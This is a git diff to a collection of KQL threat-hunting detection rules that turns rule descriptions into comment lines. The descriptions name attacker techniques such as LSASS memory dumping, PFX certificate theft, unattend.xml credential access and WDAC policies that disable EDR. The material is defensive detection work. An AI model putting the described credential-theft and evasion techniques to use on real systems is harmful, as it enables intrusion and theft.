dbghelp.dll or dbgcore.dll. -As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. -Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL. - +// The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. +// As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. +// Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1003.001, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql b/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql index f3c4df7a..a0066c20 100644 --- a/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql +++ b/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql @@ -3,7 +3,6 @@ // Date: 2023-11-20 // Level: medium // Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc. - // MITRE Tactic: Credential Access // Tags: attack.t1552, attack.credential-access, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql b/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql index a108ce05..e49ecfba 100644 --- a/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql +++ b/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql @@ -3,14 +3,11 @@ // Date: 2020-05-02 // Level: low // Description: Detects the creation of PFX files (Personal Information Exchange format). -PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to: - - - Exfiltrate digital certificates for impersonation or signing malicious code - - Establish persistent access through certificate-based authentication - - Bypass security controls that rely on certificate validation - -Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments. - +// PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to: +// - Exfiltrate digital certificates for impersonation or signing malicious code +// - Establish persistent access through certificate-based authentication +// - Bypass security controls that rely on certificate validation +// Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1552.004, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql b/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql index 01401fe1..7893ac39 100644 --- a/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql +++ b/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql @@ -3,8 +3,7 @@ // Date: 2024-07-22 // Level: low // Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored. -This file is used during the unattended windows install process. - +// This file is used during the unattended windows install process. // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql index 12150d0e..09dbf8fb 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql @@ -3,9 +3,8 @@ // Date: 2024-05-10 // Level: low // Description: Detects file access requests to Windows Outlook Mail by uncommon processes. -Could indicate potential attempt of credential stealing. -Requires heavy baselining before usage - +// Could indicate potential attempt of credential stealing. +// Requires heavy baselining before usage // MITRE Tactic: Defense Evasion // Tags: attack.t1070.008, attack.defense-evasion, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql index c25c1963..52b3cc90 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql @@ -3,8 +3,7 @@ // Date: 2025-06-04 // Level: low // Description: Detects an uncommon process loading the "BitsProxy.dll". This DLL is used when the BITS COM instance or API is used. -This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring. - +// This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.persistence, attack.t1197, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql b/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql index e433f0e5..ab2561de 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql @@ -3,8 +3,7 @@ // Date: 2024-01-19 // Level: low // Description: Detects a CodePage modification using the "mode.com" utility. -This behavior has been used by threat actors behind Dharma ransomware. - +// This behavior has been used by threat actors behind Dharma ransomware. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036, detection.threat-hunting diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql index c4dbc326..e997e57b 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql @@ -3,7 +3,6 @@ // Date: 2020-10-07 // Level: medium // Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql b/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql index 252d516e..9b5c93dc 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql @@ -3,9 +3,8 @@ // Date: 2020-07-13 // Level: medium // Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. -Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. -An initial baseline is recommended before deployment. - +// Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. +// An initial baseline is recommended before deployment. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218, attack.execution, attack.t1559.001, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql index 8fa5768b..070e25d4 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql @@ -3,8 +3,7 @@ // Date: 2024-07-23 // Level: medium // Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag. -The "--headless" flag hides the windows from the user upon execution. - +// The "--headless" flag hides the windows from the user upon execution. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, detection.threat-hunting diff --git a/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql b/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql index 34135174..247d2d13 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql @@ -3,7 +3,6 @@ // Date: 2022-10-05 // Level: medium // Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218.001, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql index ec7342ce..ed29b57e 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql @@ -3,9 +3,8 @@ // Date: 2023-12-01 // Level: medium // Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. -The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. -These can be used for example in decrypting malicious payload for defense evasion. - +// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. +// These can be used for example in decrypting malicious payload for defense evasion. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1027.010, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql b/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql index 8ba554cb..e7d53510 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql @@ -3,7 +3,6 @@ // Date: 2019-01-16 // Level: medium // Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1218, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql b/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql index 98995797..e2c4ffb4 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql @@ -3,9 +3,8 @@ // Date: 2022-01-16 // Level: low // Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. -Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. -Use this rule to hunt for potentially anomalous or suspicious communications. - +// Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. +// Use this rule to hunt for potentially anomalous or suspicious communications. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218.007, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql index 7822f107..58fe2b64 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql @@ -3,9 +3,8 @@ // Date: 2024-02-05 // Level: medium // Description: Detects the "iexpress.exe" utility creating self-extracting packages. -Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files. -Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it. - +// Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files. +// Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql b/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql index 7a55ac05..b39d3ae1 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql @@ -3,7 +3,6 @@ // Date: 2024-05-03 // Level: low // Description: Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.004, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql index 00bd0c46..7219b8ac 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql @@ -3,8 +3,7 @@ // Date: 2022-01-15 // Level: medium // Description: Detects potential CommandLine obfuscation using unicode characters. -Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. - +// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql index 2f96cedb..0277d730 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql @@ -3,9 +3,8 @@ // Date: 2021-11-26 // Level: medium // Description: Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa. -It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". -Arbitrary DLLs can also be loaded if a specific number of flags was provided. - +// It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". +// Arbitrary DLLs can also be loaded if a specific number of flags was provided. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql index fdebae7b..a75cc6de 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql @@ -3,10 +3,9 @@ // Date: 2020-10-05 // Level: low // Description: Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe". -Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter. -While this is often a legitimate action, this rule can be use to hunt for anomalies. -Muddy Waters threat actor was seeing using this technique. - +// Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter. +// While this is often a legitimate action, this rule can be use to hunt for anomalies. +// Muddy Waters threat actor was seeing using this technique. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql index d96fbbb5..f7636048 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql @@ -3,8 +3,7 @@ // Date: 2022-09-01 // Level: low // Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks. -Use this rule to hunt for potentially suspicious activity stemming from uncommon folders. - +// Use this rule to hunt for potentially suspicious activity stemming from uncommon folders. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql index 08a3a179..d9e0f02d 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql @@ -3,9 +3,8 @@ // Date: 2023-12-01 // Level: medium // Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. -The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. -These can be used for example in decrypting malicious payload for defense evasion. - +// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. +// These can be used for example in decrypting malicious payload for defense evasion. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1059.001, attack.t1027.010, attack.t1547.001, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql b/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql index 7d19e144..3cd4b760 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql @@ -3,7 +3,6 @@ // Date: 2023-10-17 // Level: medium // Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql b/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql index 6e4e0931..0e9d4b86 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql @@ -3,10 +3,9 @@ // Date: 2022-05-02 // Level: medium // Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\". -Attackers often use such directories for staging purposes. -This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation. -Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise. - +// Attackers often use such directories for staging purposes. +// This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation. +// Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting diff --git a/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql b/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql index b5e41b44..72cd5fbf 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql @@ -3,13 +3,12 @@ // Date: 2022-08-07 // Level: medium // Description: Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations. -Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs. -When investigating, examine: -- Commands using short paths to access sensitive directories or files -- Web servers on Windows (especially Apache) where short filenames could bypass security controls -- Correlation with other suspicious behaviors -- baseline of short name usage in your environment and look for deviations - +// Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs. +// When investigating, examine: +// - Commands using short paths to access sensitive directories or files +// - Web servers on Windows (especially Apache) where short filenames could bypass security controls +// - Correlation with other suspicious behaviors +// - baseline of short name usage in your environment and look for deviations // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1564.004, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql b/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql index 4401f8f5..4e321041 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql @@ -3,7 +3,6 @@ // Date: 2025-01-30 // Level: medium // Description: Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql b/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql index 483171eb..577c5378 100644 --- a/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql +++ b/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql @@ -3,8 +3,7 @@ // Date: 2022-01-22 // Level: low // Description: Detects the use of the redirection character ">" to redirect information on the command line. -This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. - +// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1082, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Discovery/process_discovery.kql b/KQL/rules-threat-hunting/Discovery/process_discovery.kql index a977aa0f..42e3ae8a 100644 --- a/KQL/rules-threat-hunting/Discovery/process_discovery.kql +++ b/KQL/rules-threat-hunting/Discovery/process_discovery.kql @@ -3,8 +3,7 @@ // Date: 2020-10-06 // Level: low // Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. -Information obtained could be used to gain an understanding of common software/applications running on systems within the network - +// Information obtained could be used to gain an understanding of common software/applications running on systems within the network // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1057, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql b/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql index 421a4caf..9e9e7d55 100644 --- a/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql +++ b/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql @@ -3,9 +3,8 @@ // Date: 2023-12-19 // Level: low // Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, -including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, -and GPU driver products/versions. - +// including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, +// and GPU driver products/versions. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1082, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql b/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql index 19469938..a4b8858b 100644 --- a/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql +++ b/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql @@ -3,7 +3,6 @@ // Date: 2020-10-05 // Level: medium // Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands. - // MITRE Tactic: Execution // Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql b/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql index bfb6db93..e6fb7135 100644 --- a/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql +++ b/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql @@ -3,7 +3,6 @@ // Date: 2022-08-04 // Level: medium // Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported. - // MITRE Tactic: Execution // Tags: attack.execution, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql b/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql index 1c82dc75..99233110 100644 --- a/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql +++ b/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql @@ -3,8 +3,7 @@ // Date: 2024-11-01 // Level: low // Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. -This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. - +// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. // MITRE Tactic: Execution // Tags: detection.threat-hunting, attack.execution // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql b/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql index cf46b317..99d5a379 100644 --- a/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql +++ b/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql @@ -3,14 +3,11 @@ // Date: 2023-02-15 // Level: medium // Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries. - -From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios. - 1. Compressed file opened using 7zip. - 2. Compressed file opened using WinRar. - 3. Compressed file opened using native windows File Explorer capabilities. - -When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter." - +// From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios. +// 1. Compressed file opened using 7zip. +// 2. Compressed file opened using WinRar. +// 3. Compressed file opened using native windows File Explorer capabilities. +// When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter." // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql b/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql index 71f64ba2..024887eb 100644 --- a/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql +++ b/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql @@ -3,7 +3,6 @@ // Date: 2024-07-10 // Level: low // Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1204.002, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql b/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql index 4ce07150..c7436eee 100644 --- a/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql +++ b/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql @@ -3,9 +3,8 @@ // Date: 2017-03-13 // Level: low // Description: Detects a network connection that was initiated from a PowerShell process. -Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. -Use this rule as a basis for hunting for anomalies. - 